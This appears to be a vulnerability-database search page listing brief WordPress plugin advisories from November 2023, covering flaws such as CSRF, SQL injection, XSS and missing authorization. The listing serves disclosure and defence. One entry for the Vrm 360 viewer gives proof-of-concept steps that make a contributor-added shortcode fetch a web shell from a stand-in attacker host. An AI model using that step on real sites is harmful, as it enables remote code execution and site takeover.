Lucene search
K
WpvulndbRecent

14602 matches found

WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.24 views

WooCommerce < 7.0.1 - Authenticated(Shop Manager+) Sensitive Information Exposure

Description The WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.0. This can allow authenticated attackers with Shop Manager privileges or above to extract sensitive user metadata including session tokens...

6.8AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.15 views

Starter Templates <= 3.2.5 - Incorrect Authorization

Description The Starter Templates free and premium plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect capability check on the sseimport function in versions up to, and including, 3.2.5. This makes it possible for authenticated attackers, with...

6.7AI score0.0033EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.14 views

Starter Templates <= 3.2.4 - Authenticated (Contributor+) Server-Side Request Forgery

Description The Starter Templates free and premium plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.2.4 via the remoterequest. This can allow authenticated attackers, with contributor-level access and above, to make web requests to arbitrary...

7.1CVSS6.9AI score0.00338EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.33 views

ProfilePress < 4.13.2 Cross-Site Request Forgery via 'admin_notice'

Description The ProfilePress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.13.1. This is due to missing or incorrect nonce validation on the 'adminnotice' function. This makes it possible for unauthenticated attackers to dismiss admin notices...

6.5AI score0.00403EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.15 views

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

8.8CVSS7.2AI score0.00985EPSS
Exploits2
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.78 views

Elementor Website Builder < 3.16.5 - Missing Authorization to Arbitrary Attachment Read

Description The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getinlinesvg function in all versions up to, and including, 3.16.4. This makes it possible for authenticated attackers, with contributor-level acces...

6.7AI score0.01452EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.9 views

iPanorama 360 – WordPress Virtual Tour Builder < 1.8.0 - Authenticated (Admin+) SQL injection

Description The iPanorama 360 plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in versions up to, and including, 1.7.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible fo...

7.5AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.7 views

Backup Migration < 1.3.0 - Cross-Site Request Forgery

Description The Backup Migration plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.9. This is due to missing nonce validation on the ajax function, or BMIAjax class. This makes it possible for unauthenticated attackers to control any of the...

6.7AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.6 views

Legal Pages < 1.3.8 - Missing Authorization on 'deleteLegalTemplate'

Description The Legal Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the deleteLegalTemplate function in versions up to, and including, 1.3.7. This makes it possible for authenticated attackers, with subscriber-level access and...

6.7AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.12 views

Site Reviews < 6.10.3 - Missing Authorization

Description The Site Reviews plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'assignPost' and 'unassignPost' functions in versions up to, and including, 6.10.2. This makes it possible for authenticated attackers to assign and unassi...

6.7AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.16 views

ProfilePress < 4.13.2 - Limited Privilege Escalation via 'acceptable_defined_roles'

Description The ProfilePress plugin for WordPress is vulnerable to limited privilege escalation in versions up to, and including, 4.13.1 via the 'acceptabledefinedroles' function due to incomplete validation on a user controlled key. This can allow unauthenticated attackers to elevate their...

7.2AI score0.01397EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.8 views

Quiz And Survey Master < 8.1.16 - Cross-Site Request Forgery via 'display_results'

Description The Quiz And Survey Master plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.1.15. This is due to missing or incorrect nonce validation on the 'displayresults' function. This makes it possible for unauthenticated attackers to submit...

6.7AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.15 views

Quiz And Survey Master < 8.1.14 - Authenticated (Contributor+) Stored Cross-Site Scripting

Description The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 8.1.13 due to insufficient input sanitization and output escaping on user...

6.5CVSS5.7AI score0.00385EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.21 views

wpDiscuz < 7.6.12 - Cross-Site Request Forgery

Description The wpDiscuz plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 7.6.11. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to dismiss admin notices via a...

8.8CVSS6.4AI score0.00261EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.15 views

WP Meta and Date Remover < 2.3.1 - Cross-Site Request Forgery via updateSettings

Description The WP Meta and Date Remover plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.0. This is due to missing or incorrect nonce validation on the updateSettings function. This makes it possible for unauthenticated attackers to chang...

6.1AI score0.00371EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.8 views

WooCommerce Subscription < 4.6.0 - Cross-Site Request Forgery

Description The WooCommerce Subscription for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and not including, 4.6.0. This is due to missing or incorrect nonce validation when suspending or canceling subscriptions. This makes it possible for unauthenticated attackers to...

6.8AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.28 views

Give - Donation Plugin < 2.33.1 - Authenticated(Give Manager+) Privilege Escalation

Description The Give - Donation Plugin plugin for WordPress is vulnerable to privilege escalation due to an insufficient capability check when updating default roles in versions up to, and including, 2.33.0. This makes it possible for authenticated attackers with Give Manager privileges to elevat...

7AI score0.00605EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.32 views

Astra Bulk Edit < 1.2.8 - Missing Authorization

Description The Astra Bulk Edit plugin for WordPress is vulnerable to unauthorized missing authorization due to a missing capability check on the savepostbulkedit function in versions up to, and including, 1.2.7. This makes it possible for attackers with contributor-level access or higher to bulk...

6.8AI score0.00387EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.21 views

WPvivid Backup Plugin < 0.9.91 - Missing Authorization via 'start_staging' and 'get_staging_progress'

Description The WPvivid Backup Plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'startstaging' and 'getstagingprogress' functions in versions up to, and including, 0.9.90. This makes it possible for authenticated...

6.2AI score0.00576EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.7 views

EWWW Image Optimizer < 7.2.1 - Sensitive Information Exposure

Description The EWWW Image Optimizer for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.2.0 due to the plugin saving debug logs in predictable locations. This can allow unauthenticated attackers to obtain information about installation paths, file...

6.8AI score
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.13 views

Customer Reviews for WooCommerce < 5.36.1 - Missing Authorization in Reviews Exporter

Description The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the checkprogress and cancelexport functions in versions up to, and including, 5.36.0. This makes it possible for...

6.2AI score0.00325EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.29 views

Contact Form for Plugin by Fluent Forms < 5.0.9 - Insecure Direct Object Reference

Description The Contact Form for Plugin by Fluent Forms plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 5.0.8 via the addIsRenderableFilter function due to missing validation on the publication status of a form. This makes it possible for...

6.8AI score0.00461EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.24 views

Phlox Portfolio < 2.3.2 - Unauthenticated Local File Inclusion

Description The Phlox Portfolio plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3.1. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files...

8.2AI score0.006EPSS
Exploits0References1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.22 views

kk Star Ratings < 5.4.6 - Missing Authorization

Description The kk Star Ratings plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on an unknown function in versions up to, and including, 5.4.5. This makes it possible for unauthenticated attackers to make use of this functionality. The exa...

7AI score0.00346EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.22 views

Unyson <= 2.7.28 - Missing Authorization

Description The Unyson plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on several functions in versions up to, and including, 2.7.28. This makes it possible for authenticated attackers, with subscriber-level access and above, to...

6.7AI score0.00337EPSS
Exploits0References1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.18 views

VK Blocks < 1.64.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Block

Description The VK Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vk-blocks/ancestor-page-list' block in all versions up to, and including, 1.63.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it...

6.4CVSS5.8AI score0.00521EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.28 views

Jetpack < 12.7 - Authenticated(Contributor+) Clickjacking via Iframe Injection

Description The Jetpack – WP Security, Backup, Speed, & Growth plugin for WordPress is vulnerable to Clickjacking via iframe injection due to an unknown parameter in all versions up to and including 12.6.2 due to insufficient input sanitization and output escaping. This makes it possible for...

7AI score0.00272EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.18 views

EWWW Image Optimizer < 7.2.1 - Unauthenticated Sensitive Information Exposure via Debug Log

Description The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debuglog function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled...

7.5CVSS6.9AI score0.02036EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.17 views

Jetpack < 12.7 - Improper Authorization via WPCom External Media REST endpoints

Description The Jetpack plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the WPCom External Media REST permissioncallback function in versions up to and including 12.6.2. This makes it possible for authenticated attackers, with...

6.7AI score0.00393EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.11 views

Carousel Slider < 2.2.3 - Missing Authorization

Description The Carousel Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handleoptinoptout function hooked via 'admininit' in versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to opt i...

6.9AI score0.00466EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.10 views

Super Socializer < 7.13.55 - Missing Authorization

Description The Super Socializer plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on several functions such as heateorsstwitcountnotificationread, heateorssgdprnotificationread, heateorssfbredirectionnotificationread,...

6.7AI score0.00554EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.12 views

iThemes Sync < 2.1.14 - Cross-Site Request Forgery and Missing Authorization via 'hide_authenticate_notice'

Description The iThemes Sync plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.13. This is due to missing or incorrect nonce validation on the hideauthenticatenotice function. This makes it possible for unauthenticated attackers to hide admin...

6.6AI score0.00383EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.24 views

WP Maintenance < 6.1.4 - IP Restriction Bypass

Description The WP Maintenance plugin for WordPress is vulnerable to IP Address Restriction Bypass in versions up to, and including, 6.1.3. This can be used to bypass settings that may have blocked out an IP address from accessing a page on the site...

6.5AI score0.0034EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.49 views

Essential Blocks <= 4.2.0 - Unauthenticated PHP Object Injection via queries

Description The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the getposts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the...

8.1CVSS7.8AI score0.00768EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/24 12:0 a.m.22 views

Simple Membership < 4.3.5 - Account Takeover via Password Reset

Description The Simple Membership plugin for WordPress is vulnerable to account takeover due to missing input validation on the processpasswordresetusinglink function in versions up to, and including, 4.3.4. This makes it possible for authenticated attackers to gain access to arbitrary accounts o...

7.2AI score0.007EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.35 views

Pre-Publish Checklist < 1.1.2 - Insecure Direct Object Reference to Arbitrary Post '_ppc_meta_key' Update

Description The Pre-Publish Checklist plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 1.1.1 via the ppcmetaboxajaxaddhandler and ppcmetaboxajaxdeletehandler functions due to missing validation on a user controlled key. This can allow...

6.9AI score0.00351EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.14 views

Quick Call Button <= 1.2.9 - Authenticated (Administrator+) Stored Cross-Site Scripting via settings

Description The Quick Call Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-lev...

5.9CVSS5.9AI score0.00386EPSS
Exploits0References1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.54 views

Nexter < 2.0.4 - Missing Authorization

Description The Nexter theme for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on several functions such as nexterextraextactiveajax, nexterextraextdeactivateajax, nexterextwpreplaceurlsettingsajax, nexterextwpduplicatepostsettingsajax,...

6.7AI score0.0035EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.15 views

Integrate Google Drive < 1.3.3 - Open Redirect via state

Description The plugin does not validate the state parameter before redirecting the user to its value, leading to an Open Redirect issue...

6.1CVSS8.7AI score0.0039EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.17 views

Events Rich Snippets for Google <= 1.8 - Cross-Site Request Forgery to Arbitrary Options Update

Description The Events Rich Snippets for Google plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8. This is due to missing or incorrect nonce validation on the handleEventSettings function. This makes it possible for unauthenticated attackers to...

7AI score0.00277EPSS
Exploits0References1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.12 views

Funnelforms Free < 3.4.2 - Missing Authorization to New Category Creation

Description The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsfaddcategory function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions a...

4.3CVSS6.7AI score0.00403EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.12 views

Superb slideshow gallery < 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode

Description The Superb slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it...

8.8CVSS7.2AI score0.00797EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.13 views

Export WP Page to Static HTML/CSS < 2.2.0 - Cross-Site Request Forgery via Multiple AJAX Actions

Description The Export WP Page to Static HTML/CSS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.9. This is due to missing or incorrect nonce validation on multiple AJAX actions. This makes it possible for unauthenticated attackers to perfor...

8.8CVSS6.5AI score0.00261EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.21 views

Sponsors <= 3.5.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Sponsors plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sponsors' shortcode in all versions up to, and including, 3.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for...

6.4CVSS5.7AI score0.00544EPSS
Exploits0References1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.15 views

Theme Switcha < 3.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Theme Switcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themeswitchalist' shortcode in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible fo...

6.4CVSS5.9AI score0.00437EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.15 views

VK Filter Search < 2.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The VK Filter Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vkfiltersearch' shortcode in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible...

6.4CVSS7.9AI score0.0044EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.21 views

WCP OpenWeather <= 2.5.0 - Cross-Site Request Forgery

Description The WCP OpenWeather plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.0. This is due to missing or incorrect nonce validation on an unknown function. This makes it possible for unauthenticated attackers to perform an unknown...

8.8CVSS6.8AI score0.00261EPSS
Exploits0References1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.12 views

WP Affiliate Disclosure < 1.2.7 - Cross-Site Request Forgery via check_capability

Description The WP Affiliate Disclosure plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.6. This is due to incorrect nonce validation logic on the checkcapability function. This makes it possible for unauthenticated attackers to update...

6.6AI score0.00198EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.25 views

LWS Hide Login < 2.1.9 - Protection Mechanism Bypass

Description The LWS Hide Login plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 2.1.8. This is due to the fact that attackers can bypass the hidden login page by visiting install.php. This makes it possible for unauthenticated attackers to...

7AI score0.00303EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2023/11/23 12:0 a.m.11 views

Live Gold Price & Silver Price Charts Widgets <= 2.4 - Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings

Description The Live Gold Price & Silver Price Charts Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated...

5.9CVSS5.9AI score0.00394EPSS
Exploits0References1
Total number of security vulnerabilities14602